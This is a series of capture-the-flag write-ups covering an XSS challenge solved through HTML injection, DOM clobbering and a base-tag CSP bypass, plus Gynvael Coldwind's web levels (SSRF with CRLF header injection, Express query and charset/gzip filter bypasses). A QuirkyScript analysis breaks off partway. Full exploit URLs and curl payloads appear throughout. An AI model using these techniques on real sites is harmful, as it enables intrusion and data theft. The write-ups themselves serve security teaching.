Recently, BugPoC announced a XSS challenge sponsored by Amazon on Twitter. It was really fun solving this challenge! :D

The rules are simple:

  • Must alert(origin) showing https://wacky.buggywebsite.com
  • Must bypass Content-Security-Policy (CSP)
  • Must work in latest version of Google Chrome
  • Must provide proof-of-concept exploit using BugPoC (duh!)

Although the XSS challenge started a week ago, I did not have time to work on the challenge. I attempted the challenge only 9 hours before it officially ended and came up with a good idea on how to craft the solution in about 15 minutes while reading the source code on phone :joy:

This challenge is fairly simple to solve, but it requires careful observation and a good understanding of the various techniques often used when performing XSS.

Introduction

Visiting the challenge site at https://wacky.buggywebsite.com/, we can see a wacky text generator. I started off by taking a quick look at the JavaScript code loaded by the webpage:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
var isChrome = /Chrome/.test(navigator.userAgent) && /Google Inc/.test(navigator.vendor);
if (!isChrome){
  document.body.innerHTML = `
    <h1>Website Only Available in Chrome</h1>
    <p style="text-align:center"> Please visit <a href="https://www.google.com/chrome/">https://www.google.com/chrome/</a> to download Google Chrome if you would like to visit this website</p>.
  `;
}

document.getElementById("txt").onkeyup = function(){
  this.value = this.value.replace(/[&*<>%]/g, '');
};


document.getElementById('btn').onclick = function(){
  val = document.getElementById('txt').value;
  document.getElementById('theIframe').src = '/frame.html?param='+val;
};

We can see that &*<>% characters are being removed the user input in the <textarea>. On clicking on the Make Whacky! button, the page loads an iframe: /frame.html?param=, which looks interesting.

HTML Injection/Reflected XSS

There is a HTML Injection/Reflected XSS at wacky.buggywebsite.com/frame.html in the <title> tag via param GET parameter.

When visiting https://wacky.buggywebsite.com/frame.html?param=REFLECTED VALUE: </title><a></a><title>, the following HTML is returned in the response body:

<!DOCTYPE html>
<html>
  <head>
    <meta charset="UTF-8">
    <title>
      REFLECTED VALUE: </title><a></a><title>
    </title>
  ...
  <body>
    <section role="container">
      <div role="main">
        <p class="text" data-action="randomizr">REFLECTED VALUE: &lt;/title&gt;&lt;a&gt;&lt;/a&gt;&lt;title&gt;</p>
  ...

The user input supplied via the param GET parameter is being reflected twice in the response – the first is printed as-is (without any sanitization or encoding), and the second being HTML-entities encoded.

This indicates that it is possible to achieve arbitrary HTML injection (i.e. arbitrary HTML elements can be injected onto the webpage) via the param GET parameter using the first reflected param value.

Note: You need to inject </title> to end the title element. Browsers ignore any unescaped HTML elements within <title> and treats any value in <title>...</title> as text only, and will not render any HTML elements found within the title element.

However, Content-Security-Policy (CSP) header in the HTTP response is set to:

script-src 'nonce-zufpozmbvckj' 'strict-dynamic'; frame-src 'self'; object-src 'none';

Thescript-src CSP directive disallows inline scripts that do not have the nonce value. In other words, injecting reflected XSS payloads such as injecting a <script> tag directly to achieve JavaScript execution will not work as the CSP disallows executing inline scripts without the nonce value, so we need to exploit vulnerabilities in the existing JavaScript code loaded by the webpage in order to execute arbitrary JavaScript code.

Source Code Analysis

Let’s examine the JavaScript code loaded on /frame.html. The relevant code snippet is shown below:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
window.fileIntegrity = window.fileIntegrity || {
    'rfc' : ' https://w3c.github.io/webappsec-subresource-integrity/',
    'algorithm' : 'sha256',
    'value' : 'unzMI6SuiNZmTzoOnV4Y9yqAjtSOgiIgyrKvumYRI6E=',
    'creationtime' : 1602687229
}

// verify we are in an iframe
if (window.name == 'iframe') {
    
    // securely load the frame analytics code
    if (fileIntegrity.value) {
        
        // create a sandboxed iframe
        analyticsFrame = document.createElement('iframe');
        analyticsFrame.setAttribute('sandbox', 'allow-scripts allow-same-origin');
        analyticsFrame.setAttribute('class', 'invisible');
        document.body.appendChild(analyticsFrame);

        // securely add the analytics code into iframe
        script = document.createElement('script');
        script.setAttribute('src', 'files/analytics/js/frame-analytics.js');
        script.setAttribute('integrity', 'sha256-'+fileIntegrity.value);
        script.setAttribute('crossorigin', 'anonymous');
        analyticsFrame.contentDocument.body.appendChild(script);
        
    }

} else {
    document.body.innerHTML = `
    <h1>Error</h1>
    <h2>This page can only be viewed from an iframe.</h2>
    <video width="400" controls>
        <source src="movie.mp4" type="video/mp4">
    </video>`
}

DOM Clobbering

The line window.fileIntegrity = window.fileIntegrity || { ... } is vulnerable to DOM clobbering. It can be observed that fileIntegrity.value is subsequently being used as the subresource integrity (SRI) hash value. By injecting an element <input id=fileIntegrity value=hash_here> onto the webpage, it is possible to clobber the fileIntegrity reference with the DOM input node, making it reference the hash value specified in the <input> tag.

Weak Inline Frame Sandbox Restrictions

It can be seen that an iframe is first being created and inserted into the DOM. However, the sandbox policy is configured to allow-scripts allow-same-origin. The allow-scripts option allows JavaScript execution, and the allow-same-origin option allows the iframe context to be treated as from being the same origin as the parent frame, therefore bypassing same-origin policy (SOP) and keeping the origin wacky.buggywebsite.com.

CSP Bypass

The code below the iframe insertion into the DOM attempts to creates a <script> element which loads a JavaScript file using the relative path files/analytics/js/frame-analytics.js. Referencing the CSP header, it can be seen that the base-uri directive is missing. This means that we can inject a <base> element with href attribute set to the attacker’s domain onto the webpage, and when the script attempts to load the relative path files/analytics/js/frame-analytics.js, the file will be loaded from the attacker-controlled domain, therefore achieving arbitrary JavaScript execution!

X-Frame-Options (XFO) Same-origin Bypass

The X-Frame-Options header in the HTTP response is set to sameorigin. This means that we cannot use an external domain to frame wacky.buggywebsite.com/frame.html to satisfy the if (window.name == 'iframe') check.

There are two ways to resolve this issue:

  1. Lure the victim user to an attacker-controlled domain, set window.name and redirecting to the vulnerable page with the XSS payload.
  2. Use HTML injection vulnerability to inject an iframe to embed itself with XSS payload (i.e. frame-ception) :sunglasses:

Option (1) is not ideal in most cases since it imposes an additional requirement for a successful XSS attack on a victim user – having to lure the user to an untrusted domain.

As such, I went ahead with option (2). We can use the HTML injection vulnerability to inject an iframe element and set name attribute to iframe on the webpage to embed itself to satisfy the check within the iframe.

However, there is a caveat to using this approach – if the aforesaid check is not satisfied on the parent frame, then the document.body.innerHTML = ... in the else statement will be executed, thereby replacing the DOM. This may cancel the loading of the iframe and hence ‘preventing’ the XSS attack from succeeding on some systems, making it an unreliable XSS attack.

To address this caveat, we can inject the start of a HTML comment <!-- without closing it with --> in the parent frame after the injected HTML elements to cause the browser to treat the rest of the webpage response as a HTML comment, hence ignoring all inline JavaScript code loaded in the remaining of the webpage.

Simulating the Attack

Before we can craft the whole exploit chain, we need to have a attacker domain hosting the XSS payload served in a JavaScript file.

To do so, we can use BugPoC’s Mock Endpoint Builder and setting it to:

Status Code: 200
Response Headers:
{
  "Content-Type": "text/javascript",
  "Access-Control-Allow-Origin": "*"
}

Response Body:
top.alert(origin)

Then, use Flexible Redirector to generate a shorter and nicer URL for the Mock Endpoint URL to be used in our exploit.

In the response header serving the XSS payload, we also need to add Access-Control-Allow-Origin: * to relax Cross-Origin Resource Sharing (CORS) since the JavaScript resource file is loaded via a cross-origin request.

Note: One thing I did not mention earlier was that because the iframe sandbox policy did not have allow-modals attribute, we cannot call alert(origin) directly in the iframe. We can simply call top.alert(origin) or parent.alert(origin) to trigger alert on the parent frame to complete the challenge.

Chaining Everything Together

Now, it’s finally time to chain everything together and exploit this XSS!

Attacker Domain Hosting XSS Payload JavaScript File:
https://y5152648ynov.redir.bugpoc.ninja

XSS Payload:
top.alert(origin)

SHA-256 Subresource Integrity Hash of XSS Payload JavaScript File:

$ openssl dgst -sha256 -binary <(printf 'top.alert(origin)') | openssl base64 -A
nLLJ57DQQUC9I87V0dhHnni5XBAy5rS3rr9QRuCoKQU=

Inner Frame URL (HTML Injection + CSP Bypass + DOM Clobbering + Trigger XSS):

/frame.html?param=</title><base href="https://y5152648ynov.redir.bugpoc.ninja"><input id=fileIntegrity name=value value='nLLJ57DQQUC9I87V0dhHnni5XBAy5rS3rr9QRuCoKQU='><title>

Outer Frame URL (HTML Injection + Load Inner Frame + Comment Out Rest of Webpage):

https://wacky.buggywebsite.com/frame.html?param=</title><iframe src="/frame.html?param=[url-encoded inner frame's param value]" name="iframe"></iframe><!--

Solution

Here’s the final solution to achieve XSS on the domain:

https://wacky.buggywebsite.com/frame.html?param=%3C/title%3E%3Ciframe%20src=%22/frame.html?param=%253C%2Ftitle%253E%253Cbase%2520href%3D%2522https%3A%2F%2Fy5152648ynov%2Eredir%2Ebugpoc%2Eninja%2522%253E%253Cinput%2520id%3DfileIntegrity%2520name%3Dvalue%2520value%3D%2527nLLJ57DQQUC9I87V0dhHnni5XBAy5rS3rr9QRuCoKQU%3D%2527%253E%253Ctitle%253E%22%20name=%22iframe%22%3E%3C/iframe%3E%3C!--

XSS Proof-of-Concept

Here are my solutions to Gynvael Coldwind (@gynvael)’s web security challenges which I thoroughly enjoyed solving!
These are specially-crafted whitebox challenges designed to test and impart certain skills.
A total of 7 independent challenges were released. Level 0 is a Flask application, whereas Levels 1 through 6 are based on Express.js.

Level 0

Problem

Target: http://challenges.gynvael.stream:5000
https://twitter.com/gynvael/status/1256352469795430407

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
#!/usr/bin/python3
from flask import Flask, request, Response, render_template_string
from urllib.parse import urlparse
import socket
import os

app = Flask(__name__)
FLAG = os.environ.get('FLAG', "???")

with open("task.py") as f:
  SOURCE = f.read()

@app.route('/secret')
def secret():
  if request.remote_addr != "127.0.0.1":
    return "Access denied!"

  if request.headers.get("X-Secret", "") != "YEAH":
    return "Nope."

  return f"GOOD WORK! Flag is {FLAG}"

@app.route('/')
def index():
  return render_template_string(
      """
      <html>
        <body>
          <h1>URL proxy with language preference!</h1>
          <form action="/fetch" method="POST">
            <p>URL: <input name="url" value="http://gynvael.coldwind.pl/"></p>
            <p>Language code: <input name="lang" value="en-US"></p>
            <p><input type="submit"></p>
          </form>
          <pre>
Task source:

          </pre>
        </body>
      </html>
      """, src=SOURCE)

@app.route('/fetch', methods=["POST"])
def fetch():
  url = request.form.get("url", "")
  lang = request.form.get("lang", "en-US")

  if not url:
    return "URL must be provided"

  data = fetch_url(url, lang)
  if data is None:
    return "Failed."

  return Response(data, mimetype="text/plain;charset=utf-8")

def fetch_url(url, lang):
  o = urlparse(url)

  req = '\r\n'.join([
    f"GET {o.path} HTTP/1.1",
    f"Host: {o.netloc}",
    f"Connection: close",
    f"Accept-Language: {lang}",
    "",
    ""
  ])

  res = o.netloc.split(':')
  if len(res) == 1:
    host = res[0]
    port = 80
  else:
    host = res[0]
    port = int(res[1])

  data = b""
  with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((host, port))
    s.sendall(req.encode('utf-8'))
    while True:
      data_part = s.recv(1024)
      if not data_part:
        break
      data += data_part

  return data

if __name__ == "__main__":
  app.run(debug=False, host="0.0.0.0")

Analysis

Looking at the source code provided, we see that there is a /secret route that will give the flag if request.remote_addr == "127.0.0.1" and if there is a HTTP header X-Secret: YEAH.

If there are reverse proxies that relay HTTP requests to the Flask application (e.g. Client <-> Reverse Proxy <-> Flask), then request.remote_addr may not be set correctly to the remote client’s IP address. So, let’s do a quick check to test this out:

$ curl 'http://challenges.gynvael.stream:5000/secret' -H 'X-Secret: YEAH'
Access denied!

Clearly, that didn’t work – the request.remote_addr is set correctly on the server end before it reaches the Flask app.

Let’s examine the other functionalities of the application. There is a suspicious /fetch endpoint provided, which invokes the fetch_url(url, lang) function:

def fetch_url(url, lang):
  o = urlparse(url)

  req = '\r\n'.join([
    f"GET {o.path} HTTP/1.1",
    f"Host: {o.netloc}",
    f"Connection: close",
    f"Accept-Language: {lang}",
    "",
    ""
  ])

  res = o.netloc.split(':')
  if len(res) == 1:
    host = res[0]
    port = 80
  else:
    host = res[0]
    port = int(res[1])

  data = b""
  with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((host, port))
    s.sendall(req.encode('utf-8'))
    while True:
      data_part = s.recv(1024)
      if not data_part:
        break
      data += data_part

  return data

Here, we can see that the URL is being parsed, and the hierarchical path (o.path) and network location part (o.netloc) are being extracted used alongside the lang parameter to create a raw HTTP request to the host and port specified in the network location part.

Clearly, there is a server-side request forgery (SSRF) vulnerability, since we can establish a raw socket connection to any host and port, and we have some control over the data to be sent!

Let’s check that we are able to reach the /secret endpoint with this SSRF vulnerability and pass the request.remote_addr == "127.0.0.1" check:

$ curl 'http://challenges.gynvael.stream:5000/fetch' -d 'url=http://127.0.0.1:5000/secret'
HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 5
Server: Werkzeug/1.0.1 Python/3.6.9
Date: Fri, 3 May 2020 09:01:05 GMT

Nope.

Great! Since we are no longer getting the Access denied! error message, we have successfully passed the check.

The last piece of the puzzle is to figure out how to set the X-Secret: YEAH HTTP header. Remember the lang parameter? Turns out, it is also not sanitized as well, so we can simply inject \r\n to terminate the Accept-Language header and inject arbitrary HTTP headers (or even requests)!

Solution

$ curl 'http://challenges.gynvael.stream:5000/fetch' -d 'url=http://127.0.0.1:5000/secret' -d 'lang=%0d%0aX-Secret: YEAH'

HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 42
Server: Werkzeug/1.0.1 Python/3.6.9
Date: Fri, 3 May 2020 09:01:17 GMT

GOOD WORK! Flag is CTF{ThesePeskyNewLines}

Flag:: CTF{ThesePeskyNewLines}


Level 1

Problem

Target: http://challenges.gynvael.stream:5001
https://twitter.com/gynvael/status/1264653010111729664

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
const express = require('express')
const fs = require('fs')

const PORT = 5001
const FLAG = process.env.FLAG || "???"
const SOURCE = fs.readFileSync('app.js')

const app = express()

app.get('/', (req, res) => {
  res.statusCode = 200
  res.setHeader('Content-Type', 'text/plain;charset=utf-8')
  res.write("Level 1\n\n")

  if (!('secret' in req.query)) {
    res.end(SOURCE)
    return
  }

  if (req.query.secret.length > 5) {
    res.end("I don't allow it.")
    return
  }

  if (req.query.secret != "GIVEmeTHEflagNOW") {
    res.end("Wrong secret.")
    return
  }

  res.end(FLAG)
})

app.listen(PORT, () => {
  console.log(`Example app listening at port ${PORT}`)
})

Analysis

In Express, req.query.* accepts and parses query string parameters into either strings, arrays or objects.

If an array is supplied, Array.toString() will return a string representation of the array values separated by commas. Furthermore, it also has a length property defining the size of the array:

> ['GIVEmeTHEflagNOW'].toString()
GIVEmeTHEflagNOW

> ['GIVEmeTHEflagNOW'].length
1

Solution

As such, we can send a secret query string parameter as an array with the constant string as its value to pass the checks and obtain the flag:

$ curl 'http://challenges.gynvael.stream:5001/?secret[]=GIVEmeTHEflagNOW'
Level 1

CTF{SmellsLikePHP}

Flag:: CTF{SmellsLikePHP}


Level 2

Problem

Target: http://challenges.gynvael.stream:5002
https://twitter.com/gynvael/status/1257784735025291265

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
const express = require('express')
const fs = require('fs')

const PORT = 5002
const FLAG = process.env.FLAG || "???"
const SOURCE = fs.readFileSync('app.js')

const app = express()

app.get('/', (req, res) => {
  res.statusCode = 200
  res.setHeader('Content-Type', 'text/plain;charset=utf-8')
  res.write("Level 2\n\n")

  if (!('X' in req.query)) {
    res.end(SOURCE)
    return
  }

  if (req.query.X.length > 800) {
    const s = JSON.stringify(req.query.X)
    if (s.length > 100) {
      res.end("Go away.")
      return
    }

    try {
      const k = '<' + req.query.X + '>'
      res.end("Close, but no cigar.")
    } catch {
      res.end(FLAG)
    }

  } else {
    res.end("No way.")
    return
  }
})

app.listen(PORT, () => {
  console.log(`Challenge listening at port ${PORT}`)
})

Analysis

Sometimes, it’s easier to work backwards. Let’s look at where the printing of the flag is at:

try {
  const k = '<' + req.query.X + '>'
  res.end("Close, but no cigar.")
} catch {
  res.end(FLAG)
}

Here, we can see that the flag is printed only when req.query.X throws an exception.

From above, we can see that type conversion may be performed on req.query.X to convert it to a string for concatenation.
This means that the toString() method of req.query.X may be invoked.

Recall that in Express, req.query.* accepts and parses query string parameters into either strings, arrays or objects.

In JavaScript, it is possible to override the default toString() inherited from the object’s prototype for arrays and objects:

> obj = { "b" : "c" }
{ b: 'c' }
> obj.toString()
'[object Object]'
> obj.toString = () => "obj.toString() overriden!"
> "" + obj
'obj.toString() overriden!'
> obj.toString()
'obj.toString() overriden!'

> arr = [ "b", "c" ]
[ 'b', 'c' ]
> arr.toString()
'b,c'
> arr.toString = () => "arr.toString() overriden!"
> arr.toString()
'arr.toString() overriden!'
> "" + arr
'arr.toString() overriden!'

Note: This is simply overriding properties (including methods) inherited from the object’s prototype. Do not confuse the above with prototype pollution!

But, if toString is not a function, then we get a TypeError:

> obj.toString = "not a function"
> "" + obj
Uncaught TypeError: Cannot convert object to primitive value

> arr.toString = "not a function too"
> "" + arr
Uncaught TypeError: Cannot convert object to primitive value

So, we can define our custom toString property using X[toString]= (which isn’t a function) to trigger the exception and print the flag.
In fact, this issue is also raised in the Express’ documentation, and it is the developers’ responsibility to validate before trusting user-controlled input:

“As req.query’s shape is based on user-controlled input, all properties and values in this object are untrusted and should be validated before trusting. For example, req.query.foo.toString() may fail in multiple ways, for example foo may not be there or may not be a string, and toString may not be a function and instead a string or other user-input.

We can also use the same method to bypass the preceding req.query.X.length > 800 check by setting X[length]=1337 too.

Solution

$ curl 'http://challenges.gynvael.stream:5002/?X[length]=1337&X[toString]='
Level 2

CTF{WaaayBeyondPHPLikeWTF}

Flag:: CTF{WaaayBeyondPHPLikeWTF}


Level 3

Problem

Target: http://challenges.gynvael.stream:5003
https://twitter.com/gynvael/status/1259087300824305665

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
// IMPORTANT NOTE:
// The secret flag you need to find is in the path name of this JavaScript file.
// So yes, to solve the task, you just need to find out what's the path name of
// this node.js/express script on the filesystem and that's it.

const express = require('express')
const fs = require('fs')
const path = require('path')

const PORT = 5003
const FLAG = process.env.FLAG || "???"
const SOURCE = fs.readFileSync(path.basename(__filename))

const app = express()

app.get('/', (req, res) => {
  res.statusCode = 200
  res.setHeader('Content-Type', 'text/plain;charset=utf-8')
  res.write("Level 3\n\n")
  res.end(SOURCE)
})

app.get('/truecolors/:color', (req, res) => {
  res.statusCode = 200
  res.setHeader('Content-Type', 'text/plain;charset=utf-8')

  const color = ('color' in req.params) ? req.params.color : '???'

  if (color === 'red' || color === 'green' || color === 'blue') {
    res.end('Yes! A true color!')
  } else {
    res.end('Hmm? No.')
  }
})

app.listen(PORT, () => {
  console.log(`Challenge listening at port ${PORT}`)
})

Analysis

Since the goal is to leak the filepath of the JavaScript file, focus is placed on finding where exceptions are being returned in the response.

After doing a quick search on GitHub for throw statements, we see that /lib/router/layer.js throws an exception if the parameter value cannot be decoded successfully using decodeURIComponent().

Solution

Supply an invalid path parameter (e.g. %) to cause the stack trace to be shown, thereby leaking the filepath of the script and hence obtaining the flag:

$ curl 'http://challenges.gynvael.stream:5003/truecolors/%'
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<pre>URIError: Failed to decode param &#39;%&#39;<br> &nbsp; &nbsp;at decodeURIComponent (&lt;anonymous&gt;)<br> &nbsp; &nbsp;at decode_param (/usr/src/app/CTF{TurnsOutItsNotRegexFault}/node_modules/express/lib/router/layer.js:172:12)<br> &nbsp; &nbsp;at Layer.match (/usr/src/app/CTF{TurnsOutItsNotRegexFault}/node_modules/express/lib/router/layer.js:148:15)<br> &nbsp; &nbsp;at matchLayer (/usr/src/app/CTF{TurnsOutItsNotRegexFault}/node_modules/express/lib/router/index.js:574:18)<br> &nbsp; &nbsp;at next (/usr/src/app/CTF{TurnsOutItsNotRegexFault}/node_modules/express/lib/router/index.js:220:15)<br> &nbsp; &nbsp;at expressInit (/usr/src/app/CTF{TurnsOutItsNotRegexFault}/node_modules/express/lib/middleware/init.js:40:5)<br> &nbsp; &nbsp;at Layer.handle [as handle_request] (/usr/src/app/CTF{TurnsOutItsNotRegexFault}/node_modules/express/lib/router/layer.js:95:5)<br> &nbsp; &nbsp;at trim_prefix (/usr/src/app/CTF{TurnsOutItsNotRegexFault}/node_modules/express/lib/router/index.js:317:13)<br> &nbsp; &nbsp;at /usr/src/app/CTF{TurnsOutItsNotRegexFault}/node_modules/express/lib/router/index.js:284:7<br> &nbsp; &nbsp;at Function.process_params (/usr/src/app/CTF{TurnsOutItsNotRegexFault}/node_modules/express/lib/router/index.js:335:12)</pre>
</body>
</html>

Flag:: CTF{TurnsOutItsNotRegexFault}


Level 4

Problem

Target: http://challenges.gynvael.stream:5004
https://twitter.com/gynvael/status/1260499214225809409

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
const express = require('express')
const fs = require('fs')
const path = require('path')

const PORT = 5004
const FLAG = process.env.FLAG || "???"
const SOURCE = fs.readFileSync(path.basename(__filename))

const app = express()

app.use(express.text({
  verify: (req, res, body) => {
    const magic = Buffer.from('ShowMeTheFlag')

    if (body.includes(magic)) {
      throw new Error("Go away.")
    }
  }
}))

app.post('/flag', (req, res) => {
  res.statusCode = 200
  res.setHeader('Content-Type', 'text/plain;charset=utf-8')
  if ((typeof req.body) !== 'string') {
    res.end("What?")
    return
  }

  if (req.body.includes('ShowMeTheFlag')) {
    res.end(FLAG)
    return
  }

  res.end("Say the magic phrase!")
})

app.get('/', (req, res) => {
  res.statusCode = 200
  res.setHeader('Content-Type', 'text/plain;charset=utf-8')
  res.write("Level 4\n\n")
  res.end(SOURCE)
})

app.listen(PORT, () => {
  console.log(`Challenge listening at port ${PORT}`)
})

Analysis

Looking at the verify function, we see that there is a body.includes(magic) check that we need to satisfy, and req.body.includes('ShowMeTheFlag') must return true in the /flag endpoint POST handler.

According to Express’ documentation for express.text(), we see that the verify option is invoked as verify(req, res, buf, encoding), where buf is a Buffer of the raw request body and encoding is the encoding of the request.

This means that the body parameter in the verify function has yet to be decoded from the encoding type specified by the client. Notice that the body.includes(magic) in the verify function implicitly assumes that the request body contents supplied is in ASCII/UTF-8, as it fails to decode and convert the raw request to a common encoding before performing the check.

Solution

The solution is simple – use a different charset that uses multibyte characters, e.g. utf-16, utf-16le, utf-16be, and encode the constant string ShowMeTheFlag in the charset specified:

$ curl -H 'Content-Type: text/plain;charset=utf-16' --data-binary @<(python -c "print 'ShowMeTheFlag'.encode('utf-16')") 'http://challenges.gynvael.stream:5004/flag'

CTF{||ButVerify()WasSupposedToProtectUs!||}

Flag:: CTF{||ButVerify()WasSupposedToProtectUs!||}


Level 5

Problem

Target: http://challenges.gynvael.stream:5005
https://twitter.com/gynvael/status/1262434816714313729

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
const http = require('http')
const express = require('express')
const fs = require('fs')
const path = require('path')

const PORT = 5005
const FLAG = process.env.FLAG || "???"
const SOURCE = fs.readFileSync(path.basename(__filename))

const app = express()

app.use(express.urlencoded({extended: false}))

app.post('/flag', (req, res) => {
  res.statusCode = 200
  res.setHeader('Content-Type', 'text/plain;charset=utf-8')

  if (req.body.secret !== 'ShowMeTheFlag') {
    res.end("Say the magic phrase!")
    return
  }

  if (req.youAreBanned) {
    res.end("How about no.")
    return
  }

  res.end(FLAG)
})

app.get('/', (req, res) => {
  res.statusCode = 200
  res.setHeader('Content-Type', 'text/plain;charset=utf-8')
  res.write("Level 5\n\n")
  res.end(SOURCE)
})

const proxy = function(req, res) {
  req.youAreBanned = false
  let body = ''
  req
    .prependListener('data', (data) => { body += data })
    .prependListener('end', () => {
      const o = new URLSearchParams(body)
      req.youAreBanned = o.toString().includes("ShowMeTheFlag")
    })
  return app(req, res)
}

const server = http.createServer(proxy)
server.listen(PORT, () => {
  console.log(`Challenge listening at port ${PORT}`)
})

Analysis

We can observe that the code above is similar to that of Level 4, with some changes.

The first change is the use of app.use(express.urlencoded({extended: false})) instead of app.use(express.text(...). The second change is the use of http.createServer(proxy) to intercept the raw request body data before passing to Express instead of using the verify option.

Similar to Level 4, req.youAreBanned = o.toString().includes("ShowMeTheFlag") assumes the charset encoding of the request body when performing the check.

But, when issuing the request, we see an error:

$ curl -H 'Content-Type: application/x-www-form-urlencoded; charset=utf-16le' --data-binary @<(python -c "print 'secret=ShowMeTheFlag'.encode('utf-16le')") 'http://challenges.gynvael.stream:5005/flag'
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<pre>UnsupportedMediaTypeError: unsupported charset &quot;UTF-16LE&quot;<br> &nbsp; &nbsp;at urlencodedParser (/usr/src/app/node_modules/body-parser/lib/types/urlencoded.js:108:12)<br> &nbsp; &nbsp;at Layer.handle [as handle_request] (/usr/src/app/node_modules/express/lib/router/layer.js:95:5)<br> &nbsp; &nbsp;at trim_prefix (/usr/src/app/node_modules/express/lib/router/index.js:317:13)<br> &nbsp; &nbsp;at /usr/src/app/node_modules/express/lib/router/index.js:284:7<br> &nbsp; &nbsp;at Function.process_params (/usr/src/app/node_modules/express/lib/router/index.js:335:12)<br> &nbsp; &nbsp;at next (/usr/src/app/node_modules/express/lib/router/index.js:275:10)<br> &nbsp; &nbsp;at expressInit (/usr/src/app/node_modules/express/lib/middleware/init.js:40:5)<br> &nbsp; &nbsp;at Layer.handle [as handle_request] (/usr/src/app/node_modules/express/lib/router/layer.js:95:5)<br> &nbsp; &nbsp;at trim_prefix (/usr/src/app/node_modules/express/lib/router/index.js:317:13)<br> &nbsp; &nbsp;at /usr/src/app/node_modules/express/lib/router/index.js:284:7</pre>
</body>
</html>

This is because express.urlencoded (urlencoded in body-parser) asserts if the charset encoding for Content-Type: application/x-www-form-urlencoded is utf-8. So, it is not possible to specify any other charset encoding.

Solution

Speaking of encoding, there’s one more thing we have yet to try – Content-Encoding.

Recall that the raw request body data is being not decoded before being checked in proxy(). This means that we can encode the contents, e.g. using gzip compression, and specify Content-Encoding: gzip header, and the gzip-compressed contents will be used in the proxy() function (which passes the first check). Then, the body will decoded by Express before passing to the /flag endpoint POST handler, which correctly sets secret=ShowMeTheFlag:

$ curl -H 'Content-Encoding: gzip' --data-binary @<(printf 'secret=ShowMeTheFlag' | gzip) 'http://challenges.gynvael.stream:5005/flag'
CTF{||SameAsLevel4ButDifferent||}

Flag:: CTF{||SameAsLevel4ButDifferent||}


Level 6

Problem

Target: http://challenges.gynvael.stream:5006
https://twitter.com/gynvael/status/1264504663791058945

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
const http = require('http')
const express = require('express')
const fs = require('fs')
const path = require('path')

const PORT = 5006
const FLAG = process.env.FLAG || "???"
const SOURCE = fs.readFileSync(path.basename(__filename))

const app = express()

const checkSecret = (secret) => {
  return
    [
      secret.split("").reverse().join(""),
      "xor",
      secret.split("").join("-")
    ].join('+')
}

app.get('/flag', (req, res) => {
  res.statusCode = 200
  res.setHeader('Content-Type', 'text/plain;charset=utf-8')

  if (!req.query.secret1 || !req.query.secret2) {
    res.end("You are not even trying.")
    return
  }

  if (`<${checkSecret(req.query.secret1)}>` === req.query.secret2) {
    res.end(FLAG)
    return
  }

  res.end("Lul no.")
})

app.get('/', (req, res) => {
  res.statusCode = 200
  res.setHeader('Content-Type', 'text/plain;charset=utf-8')
  res.write("Level 6\n\n")
  res.end(SOURCE)
})

app.listen(PORT, () => {
  console.log(`Example app listening at port ${PORT}`)
})

Analysis

Notice that checkSecret has a return keyword on line 13, but the value that was supposed to be returned is on the following lines.
This is a common mistake made when coding in JavaScript. In JavaScript, automatic semicolon insertion (ASI) is performed on some statements, such as return, that must be terminated with semicolons.

As such, a semicolon is automatically inserted after the return keyword and before the newline as such:

const checkSecret = (secret) => {
  return; // ASI performed here; below lines are ignored
    [
      secret.split("").reverse().join(""),
      "xor",
      secret.split("").join("-")
    ].join('+')
}

This means that effectively, undefined is being returned by the checkSecret arrow function expression.

Solution

To pass the checks, we simply set secret1 query string parameter to a non-empty value, and secret2 to <undefined>:

$ curl 'http://challenges.gynvael.stream:5006/flag?secret1=a&secret2=<undefined>'

CTF{||RevengeOfTheScript||}

Flag:: CTF{||RevengeOfTheScript||}

I did not participate in this competition, but I was asked by the organisers to take a look at the challenges.
Here are my analysis and solutions for 5 web challenges which I thought were rather interesting.
Enjoy! :smile:

QuirkyScript 1

Problem

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
var flag = require("./flag.js");
var express = require('express')
var app = express()

app.get('/flag', function (req, res) {
    if (req.query.first) {
        if (req.query.first.length == 8 && req.query.first == ",,,,,,,") {
            res.send(flag.flag);
            return;
        }
    }
    res.send("Try to solve this.");
});

app.listen(31337)

Analysis

Observe that in the source code provided, loose equality comparison (==) is used instead of strict equality comparison (===).
Loose equality compares two values for equality after converting both operands to a common type. When in doubt, refer to the documentation on equality comparisons and sameness!

Let’s look at the comparison req.query.first == ",,,,,,,":

  • If req.query.first is a String – no type conversion is performed as both operands are of a common type.
  • If req.query.first is an Object – type conversion is performed on req.query.first to String by invoking req.query.first.toString() before comparing both operands.

